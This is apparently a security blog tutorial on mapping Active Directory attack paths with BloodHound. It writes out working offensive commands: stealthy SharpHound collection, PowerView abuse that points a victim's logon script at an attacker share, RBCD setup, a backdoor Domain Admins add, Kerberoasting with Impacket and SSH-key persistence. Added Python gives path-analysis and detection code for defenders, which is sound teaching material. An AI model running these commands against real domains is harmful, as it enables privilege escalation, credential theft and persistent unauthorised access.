Unleash BloodHound’s True Power: How OpenGraph and TaskHound Are Revolutionizing Active Directory Attacks

Introduction:

The landscape of Active Directory (AD) exploitation is evolving with the integration of OpenGraph protocols into popular security tools. The emerging integration between BloodHound, the premier AD attack path mapping tool, and TaskHound demonstrates a new frontier in automating and visualizing complex attack chains, pushing the boundaries of both offensive security and defensive hardening.

Learning Objectives:

  • Understand the core concepts of BloodHound, OpenGraph, and how their integration enhances attack path analysis.
  • Learn to utilize key BloodHound Cypher queries for identifying critical attack paths and privileged service accounts.
  • Master the commands for data collection with SharpHound and the methodology for exploiting discovered relationships.

You Should Know:

1. Data Collection with SharpHound

SharpHound is the data collector for BloodHound. It gathers information about users, groups, computers, and their relationships within the AD environment.

Command:

# Ingest all data using the CollectionMethod All
SharpHound.exe --CollectionMethod All --Domain corp.com --ZipFilename corp_data.zip

# Perform a stealthy, targeted collection for logged-on users and session data
SharpHound.exe -c Session,LoggedOn,GroupMembership --Stealth --Loop --loopduration 00:30:00 --jitter 23

Step-by-step guide:

The first command, executed from a domain-joined Windows machine, initiates a comprehensive data collection. The `--CollectionMethod All` parameter instructs SharpHound to enumerate all available data points, including group membership, local admin rights, and Active Directory sessions. The `--ZipFilename` parameter consolidates the output into a single compressed archive for ingestion into the BloodHound UI. The second command is designed for stealthier operation: it collects only the listed data types, repeats the collection in a loop for 30 minutes (`--loopduration 00:30:00`) and applies jitter to its timing (`--jitter 23`) to avoid pattern-based detection. From the defender's side, both modes still generate LDAP enumeration plus SMB session and logged-on-user queries against many hosts from a single workstation, which is the signal to hunt for.

2. Identifying High-Value Attack Paths with Cypher

BloodHound’s power lies in its graph database, queried using the Cypher language. This query finds the shortest path from a compromised user to a high-value target like a Domain Admin.

Cypher Query:

// COMPROMISED_USER is a placeholder: substitute the account under investigation
MATCH (u:User {name: "COMPROMISED_USER@CORP.COM"}), (g:Group {name: "DOMAIN ADMINS@CORP.COM"}), p = shortestPath((u)-[*1..]->(g)) RETURN p

Step-by-step guide:

This query is executed within the BloodHound user interface's analysis tab. It defines a start node (u) as a specific user and an end node (g) as the Domain Admins group. The `p = shortestPath((u)-[*1..]->(g))` portion runs a breadth-first shortest-path search to find the most direct relationship chain (through group membership, ACLs, sessions, etc.) connecting the user to the privileged group. The result visually maps the exact steps an attacker would need to take, and for a defender each non-membership edge on that path is a candidate to remove.
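The following Python script is an added illustration (not code from the post, from BloodHound or from TaskHound) of what the Cypher `shortestPath` above computes: a breadth-first search over directed edges, run here on a small constructed edge list in the shape BloodHound stores relationships (source, edge type, target). The node names and the graph are invented for the example; the edge types (MemberOf, GenericWrite, AdminTo, HasSession) are real BloodHound edge kinds. It goes one step past the query by listing the hops a defender should review first, since cutting a single ACL or session edge breaks the chain while group nesting is usually legitimate.

```python
from collections import deque

# Constructed toy graph of BloodHound-style directed edges: (source, edge type, target).
# This is not SharpHound output; names and relationships are invented for the example.
EDGES = [
    ("ALICE@CORP.COM",         "MemberOf",     "HELPDESK@CORP.COM"),
    ("ALICE@CORP.COM",         "MemberOf",     "DOMAIN USERS@CORP.COM"),
    ("HELPDESK@CORP.COM",      "GenericWrite", "SVC_BACKUP@CORP.COM"),
    ("SVC_BACKUP@CORP.COM",    "MemberOf",     "SERVER ADMINS@CORP.COM"),
    ("SERVER ADMINS@CORP.COM", "AdminTo",      "DC01.CORP.COM"),
    ("DC01.CORP.COM",          "HasSession",   "DOMADMIN@CORP.COM"),
    ("DOMADMIN@CORP.COM",      "MemberOf",     "DOMAIN ADMINS@CORP.COM"),
    ("BOB@CORP.COM",           "MemberOf",     "FINANCE@CORP.COM"),
]

# Edge types that represent an abusable right or an exposure rather than plain group
# nesting. Removing one of these usually breaks the path without touching legitimate membership.
ABUSABLE_EDGES = {"GenericWrite", "GenericAll", "WriteDacl", "WriteOwner",
                  "AdminTo", "HasSession", "AllowedToDelegate", "AddMember"}


def build_graph(edges):
    """Adjacency list: node -> list of (edge_type, target)."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
    return graph


def shortest_path(graph, start, goal):
    """Breadth-first search; returns the hop list [(src, rel, dst), ...] or None if unreachable."""
    if start == goal:
        return []
    parents = {start: None}          # node -> (previous node, edge type used to reach it)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for rel, nxt in graph.get(node, []):
            if nxt in parents:
                continue             # already reached by an equal-or-shorter path
            parents[nxt] = (node, rel)
            if nxt == goal:
                hops, cur = [], nxt
                while parents[cur] is not None:
                    prev, r = parents[cur]
                    hops.append((prev, r, cur))
                    cur = prev
                hops.reverse()
                return hops
            queue.append(nxt)
    return None


def format_path(hops):
    """Render hops the way the BloodHound UI reads: A -[MemberOf]-> B -[AdminTo]-> C."""
    if not hops:
        return ""
    out = hops[0][0]
    for _, rel, dst in hops:
        out += f" -[{rel}]-> {dst}"
    return out


def cut_candidates(hops):
    """Hops a defender should review first: the non-membership edges on the path."""
    return [(s, r, d) for s, r, d in hops if r in ABUSABLE_EDGES]


if __name__ == "__main__":
    g = build_graph(EDGES)
    path = shortest_path(g, "ALICE@CORP.COM", "DOMAIN ADMINS@CORP.COM")
    print(format_path(path))
    for src, rel, dst in cut_candidates(path):
        print(f"  review: {src} has {rel} on {dst}")
```

Real BloodHound paths use the same idea with many more edge types; the point of the toy is that a six-hop chain from an ordinary user to Domain Admins here rests on only three removable edges.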

3. Exploiting GenericWrite Permissions

A common finding in BloodHound is a user having `GenericWrite` permissions over another user or computer object, allowing for attribute modification and privilege escalation.

PowerShell Commands:

# Using PowerView to abuse GenericWrite on a user to set a scriptPath (logon script)
Set-DomainObject -Identity TargetUser -Set @{scriptpath='\\attacker-server\scripts\malicious.cmd'} -Verbose

# Using PowerView to abuse GenericWrite on a computer object for Resource-Based Constrained Delegation
Set-DomainObject -Identity TargetComputer$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=(Get-DomainComputer AttackerComputer$).securityidentifier} -Verbose

Step-by-step guide:

The first command modifies the `scriptPath` attribute of a target user. The next time that user logs on, the system will execute the script from the attacker-controlled share, potentially granting the attacker code execution in the user’s context. The second command configures Resource-Based Constrained Delegation on a target computer, allowing the attacker’s computer to impersonate users on it. This requires the attacker to already have control over a computer account.

4. Leveraging Dangerous Built-in Groups

Groups like `Account Operators` have potentially dangerous permissions that can be misused, even if they are not directly privileged.

Command (via net.exe):

# Add a user to a group using the Account Operators membership
net group "Domain Admins" NewBackdoorUser /add /domain

Step-by-step guide:

While the `Account Operators` group cannot by default modify highly privileged groups such as Domain Admins, it has extensive permissions over other accounts and non-protected groups. The command shows the syntax of the principle rather than a guaranteed outcome: if a member of `Account Operators` can create or modify an account that is itself a member of a privileged group (or holds other abusable rights), they can escalate through it. BloodHound will reveal whether such a path exists.

5. DCSync Attack Detection and Mitigation

The DCSync attack allows an attacker to impersonate a domain controller and replicate password data. BloodHound can identify users or computers with the replication rights necessary to perform this.

Cypher Query to Find DCSync Principals:

MATCH (n) WHERE (n.objectid CONTAINS "S-1-5-21") AND (n:User OR n:Computer) WITH n MATCH (n)-[r:GetChanges|GetChangesAll|GetChangesInFilteredSet]->(d:Domain) RETURN n.name, type(r), d.name

Step-by-step guide:

This Cypher query identifies all users and computers holding a `GetChanges`, `GetChangesAll` or `GetChangesInFilteredSet` edge over a domain; the first two held together are the replication rights a DCSync attack needs. Defensively, this query is critical for auditing. To mitigate, these permissions should be restricted to only essential Domain Controllers and highly protected backup or directory-synchronisation accounts, and every principal the query returns that is not one of those should be treated as a finding.
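As an added detection example covering both section 3 (GenericWrite abuse via `scriptPath` and RBCD) and this section (DCSync), the Python below runs two rules over constructed Windows Security log records. The field names follow event 5136 (directory service object modified) and event 4662 (an operation was performed on an object), but every record is invented for the example; nothing here is real telemetry, and the allowlist of expected replicators is a hypothetical value to tune per environment. The replication control-access-right GUIDs are the Active Directory constants that appear in a 4662 `Properties` field when replication rights are exercised. This code is not from the post or from BloodHound.

```python
# Control-access-right GUIDs that appear in the Properties field of event 4662 when
# replication rights are exercised. These are Active Directory constants.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Attributes whose modification is worth an alert regardless of who did it (lower-cased).
SENSITIVE_ATTRIBUTES = {"scriptpath", "msds-allowedtoactonbehalfofotheridentity"}

# Hypothetical allowlist: accounts expected to replicate (domain controllers and, where
# present, a directory-sync account). Lower-cased; tune per environment.
EXPECTED_REPLICATORS = {"dc01$", "dc02$", "msol_sync"}

# Constructed sample events (not real telemetry). Only the fields the rules use are kept.
EVENTS = [
    {"EventID": 5136, "SubjectUserName": "helpdesk1",
     "ObjectDN": "CN=svc_backup,OU=Service,DC=corp,DC=com",
     "AttributeLDAPDisplayName": "scriptPath",
     "AttributeValue": "\\\\attacker-server\\scripts\\malicious.cmd"},
    {"EventID": 5136, "SubjectUserName": "hr_admin",
     "ObjectDN": "CN=bob,OU=Users,DC=corp,DC=com",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "Finance team"},
    {"EventID": 5136, "SubjectUserName": "helpdesk1",
     "ObjectDN": "CN=FILE01,OU=Servers,DC=corp,DC=com",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "AttributeValue": "<binary security descriptor>"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectType": "domainDNS",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_backup", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "bob", "ObjectType": "user",
     "Properties": "{12345678-0000-0000-0000-000000000000}"},  # constructed, unrelated GUID
]


def detect_sensitive_attribute_writes(events):
    """Rule 1: 5136 events that set a logon-script or RBCD attribute on any object."""
    findings = []
    for e in events:
        if e.get("EventID") != 5136:
            continue
        attr = e.get("AttributeLDAPDisplayName", "")
        if attr.lower() in SENSITIVE_ATTRIBUTES:
            findings.append({"rule": "sensitive-attribute-write",
                             "actor": e["SubjectUserName"],
                             "object": e["ObjectDN"], "attribute": attr})
    return findings


def detect_replication_by_unexpected_principal(events, expected=EXPECTED_REPLICATORS):
    """Rule 2: 4662 events where a replication right is exercised by a non-allowlisted account."""
    findings = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        props = e.get("Properties", "").lower()
        rights = sorted(name for guid, name in REPLICATION_GUIDS.items() if guid in props)
        if rights and e["SubjectUserName"].lower() not in expected:
            findings.append({"rule": "dcsync-like-replication",
                             "actor": e["SubjectUserName"], "rights": rights})
    return findings


def run_detections(events):
    """Apply both rules and return the combined finding list (attribute writes first)."""
    return detect_sensitive_attribute_writes(events) + detect_replication_by_unexpected_principal(events)


if __name__ == "__main__":
    for f in run_detections(EVENTS):
        print(f)
```

Both rules need the corresponding auditing enabled on the domain controllers (Directory Service Changes for 5136, Directory Service Access for 4662) and a SACL on the domain object; without that the events never reach the log. The DCSync rule deliberately keys on who exercised the right rather than on the rights alone, because the DCs themselves replicate constantly.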

6. Kerberoasting from a Compromised Context

Kerberoasting is a common technique for attacking service accounts. BloodHound often reveals paths that allow a low-privilege user to request service tickets for target accounts.

Command (from a Linux perspective with Impacket):

# Request service tickets for all SPNs in the domain and output them in a format crackable by Hashcat
python3 GetUserSPNs.py -dc-ip 10.10.10.10 corp.com/standard_user -request

Step-by-step guide:

This command uses the Impacket toolkit’s `GetUserSPNs.py` script. It queries the Domain Controller (-dc-ip) for all Service Principal Names (SPNs). If the standard user has the necessary permissions to request these tickets (which is common), the script will return Ticket-Granting Service (TGS) tickets. These are encrypted with the service account’s password hash and can be taken offline for brute-force cracking with tools like Hashcat.
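The Python below is an added example (not from the post or from Impacket) of what the defender does with the same fact: a Kerberoast run shows up as one account obtaining RC4-encrypted service tickets (event 4769, `TicketEncryptionType` 0x17) for many distinct service accounts in a short burst. The first function applies that sliding-window rule to constructed 4769 records; the second covers mitigation by listing SPN-bearing accounts whose `msDS-SupportedEncryptionTypes` still permits RC4, since those are the accounts whose tickets can be cracked offline. All records and account names are invented; the etype bit values are the documented constants.

```python
from collections import defaultdict, deque
from datetime import datetime

# Constructed 4769 (Kerberos service ticket requested) records. Field names follow the
# Windows Security log; the values are invented for this example and are not real telemetry.
EVENTS = [
    {"time": "2024-05-01T09:00:01", "TargetUserName": "standard_user@CORP.COM", "ServiceName": "svc_sql",    "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-05-01T09:00:05", "TargetUserName": "standard_user@CORP.COM", "ServiceName": "svc_web",    "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-05-01T09:00:09", "TargetUserName": "standard_user@CORP.COM", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-05-01T09:00:12", "TargetUserName": "standard_user@CORP.COM", "ServiceName": "DC01$",      "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-05-01T09:00:15", "TargetUserName": "standard_user@CORP.COM", "ServiceName": "krbtgt",     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"time": "2024-05-01T09:00:20", "TargetUserName": "standard_user@CORP.COM", "ServiceName": "svc_iis",    "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-05-01T10:00:00", "TargetUserName": "admin@CORP.COM",         "ServiceName": "svc_sql",    "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"time": "2024-05-01T11:00:00", "TargetUserName": "bob@CORP.COM",           "ServiceName": "svc_web",    "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-05-01T11:30:00", "TargetUserName": "bob@CORP.COM",           "ServiceName": "svc_sql",    "TicketEncryptionType": "0x17", "Status": "0x0"},
]

RC4_HMAC = "0x17"  # Kerberos etype 23, the ticket type that yields a crackable hash


def detect_kerberoasting(events, window_seconds=300, min_services=3):
    """Flag requesters that obtain RC4 service tickets for at least min_services distinct
    service accounts within any window_seconds span. Returns {user: sorted services}."""
    by_user = defaultdict(list)
    for e in events:
        if e["TicketEncryptionType"].lower() != RC4_HMAC or e["Status"] != "0x0":
            continue  # AES tickets and failed requests are not the Kerberoast signal
        svc = e["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue  # TGT traffic and computer accounts (random passwords, not crackable)
        by_user[e["TargetUserName"]].append((datetime.fromisoformat(e["time"]), svc))

    flagged = {}
    for user, requests in by_user.items():
        requests.sort()
        window = deque()
        for ts, svc in requests:
            window.append((ts, svc))
            while (ts - window[0][0]).total_seconds() > window_seconds:
                window.popleft()  # drop requests that fell out of the time window
            distinct = {s for _, s in window}
            if len(distinct) >= min_services:
                flagged.setdefault(user, set()).update(distinct)
    return {user: sorted(svcs) for user, svcs in flagged.items()}


# msDS-SupportedEncryptionTypes bits (documented constants).
RC4_BIT, AES128_BIT, AES256_BIT = 0x4, 0x8, 0x10

# Constructed LDAP-style records of SPN-bearing accounts (hypothetical values).
ACCOUNTS = [
    {"sAMAccountName": "svc_sql",    "servicePrincipalName": ["MSSQLSvc/sql01.corp.com:1433"], "msDS-SupportedEncryptionTypes": 0},
    {"sAMAccountName": "svc_web",    "servicePrincipalName": ["HTTP/web01.corp.com"],          "msDS-SupportedEncryptionTypes": AES128_BIT | AES256_BIT},
    {"sAMAccountName": "svc_backup", "servicePrincipalName": ["backup/bk01.corp.com"],         "msDS-SupportedEncryptionTypes": RC4_BIT | AES256_BIT},
    {"sAMAccountName": "alice",      "servicePrincipalName": [],                               "msDS-SupportedEncryptionTypes": 0},
]


def rc4_capable_service_accounts(accounts):
    """Mitigation view: accounts with an SPN whose etypes still allow RC4. An absent or zero
    value falls back to the DC default, which has historically included RC4."""
    out = []
    for a in accounts:
        if not a.get("servicePrincipalName"):
            continue  # no SPN, no service ticket to roast
        etypes = a.get("msDS-SupportedEncryptionTypes") or 0
        if etypes == 0 or etypes & RC4_BIT:
            out.append(a["sAMAccountName"])
    return out


if __name__ == "__main__":
    print(detect_kerberoasting(EVENTS))
    print(rc4_capable_service_accounts(ACCOUNTS))
```

The thresholds (300 seconds, three services) are a starting point; a monitoring or backup product that legitimately touches many SPNs needs an allowlist. Moving the flagged accounts to AES-only, or to group managed service accounts, removes the crackable ticket rather than just the alert.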

7. Linux Persistence via SSH Authorized Keys

In hybrid environments, compromising an account with SSH access to a Linux server connected to AD can be a critical pivot point.

Command:

# Append an attacker's public key to the authorized_keys file of a user for persistence
echo "ssh-rsa AAAAB3NzaC1yc2E... attacker@kali" >> ~/.ssh/authorized_keys

# Set correct permissions
chmod 600 ~/.ssh/authorized_keys

Step-by-step guide:

This is a fundamental persistence technique. After gaining initial access to a Linux box (e.g., via a cracked password found through Kerberoasting), the attacker adds their public SSH key to the `authorized_keys` file of the current or another compromised user. This allows for password-less, persistent access to the server. The `chmod` command ensures the file permissions are restrictive enough for the SSH daemon to accept the key.
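The Python below is an added example (not from the post) of the audit that catches this technique: parse each `authorized_keys` entry, compute the OpenSSH-style SHA256 fingerprint of the key blob, compare it against the set of fingerprints configuration management says should be present, and check that the file mode is as restrictive as the `chmod 600` above. The `demo()` function builds a throwaway file in a temporary directory with one approved and one unknown key; the key blobs are arbitrary constructed bytes standing in for real public keys, and the allowlist is hypothetical.

```python
import base64
import hashlib
import os
import stat
import tempfile

# Prefixes of the key-type token that begins the key proper in an authorized_keys line.
KEY_TYPE_PREFIXES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-", "sk-ssh-ed25519", "sk-ecdsa-sha2-")


def fingerprint(b64_blob):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob (the form ssh-keygen -l prints)."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """One dict per key line; any options before the key type are preserved verbatim."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        tokens = s.split()
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(tokens):
            entries.append({"line": lineno, "error": "unparseable"})
            continue
        entries.append({"line": lineno, "options": " ".join(tokens[:idx]), "type": tokens[idx],
                        "fingerprint": fingerprint(tokens[idx + 1]),
                        "comment": " ".join(tokens[idx + 2:])})
    return entries


def audit_authorized_keys(path, approved_fingerprints):
    """Return readable findings: loose permissions and any key not on the allowlist."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:
        # sshd's StrictModes only rejects group/world-writable files; requiring 0600 is the
        # stricter baseline that matches the chmod in the post.
        findings.append(f"{path}: mode {oct(mode)} grants group/other access, expected 0600")
    with open(path, encoding="utf-8") as f:
        for e in parse_authorized_keys(f.read()):
            if "error" in e:
                findings.append(f"line {e['line']}: unparseable entry")
            elif e["fingerprint"] not in approved_fingerprints:
                findings.append(f"line {e['line']}: unapproved key {e['fingerprint']} "
                                f"({e['comment'] or 'no comment'})")
    return findings


def demo():
    """Write a throwaway authorized_keys with one approved and one unknown key, then audit it."""
    # Constructed key blobs: arbitrary bytes, base64-encoded, standing in for real public keys.
    approved_blob = base64.b64encode(b"constructed-approved-ed25519-key").decode()
    rogue_blob = base64.b64encode(b"constructed-unknown-rsa-key").decode()
    allowlist = {fingerprint(approved_blob)}  # what config management says should be there
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "authorized_keys")
        with open(path, "w", encoding="utf-8") as f:
            f.write("# managed by config management\n")
            f.write(f'from="10.0.0.5" ssh-ed25519 {approved_blob} ops@bastion\n')
            f.write(f"ssh-rsa {rogue_blob} attacker@kali\n")
        os.chmod(path, 0o644)  # deliberately loose so the permission check fires
        return audit_authorized_keys(path, allowlist)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run the audit from configuration management or a file-integrity monitor against every user's `~/.ssh/authorized_keys` and the sshd `AuthorizedKeysFile` locations; an entry whose fingerprint is not in the inventory is the finding, whatever its comment field claims.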

What Undercode Say:

  • The integration of OpenGraph standards into tools like BloodHound signifies a move towards interconnected security tooling, where data from disparate sources can be unified to create a more complete picture of an enterprise’s attack surface.
  • Defenders must shift from a siloed view of permissions to a graph-based understanding, where the chain of relationships is the primary concern, not just the direct privileges of a single account.

The development of TaskHound leveraging BloodHound’s OpenGraph API is not just a feature update; it’s a paradigm shift. It points towards a future where complex, multi-tool attack workflows can be predefined, visualized, and executed with precision. For blue teams, this underscores the non-negotiable need to regularly run BloodHound in their own environments, using the same Cypher queries attackers use, to find and dismantle these paths before they are exploited. The automation of attack path discovery lowers the barrier to entry for less skilled attackers while simultaneously increasing the efficiency of advanced actors.

Prediction:

The formalization and standardization of attack path data through protocols like OpenGraph will lead to an explosion of automated “attack playbooks.” In the next 18-24 months, we will see a rise in AI-driven penetration testing tools that can autonomously navigate BloodHound-identified paths, make logical decisions about which exploitation technique to use, and execute complex attack chains with minimal human interaction. This will drastically reduce the time from initial compromise to domain dominance, forcing defenders to adopt equally automated and continuous threat path monitoring and mitigation systems.

Reported By: Robin Unglaub – Hackers Feeds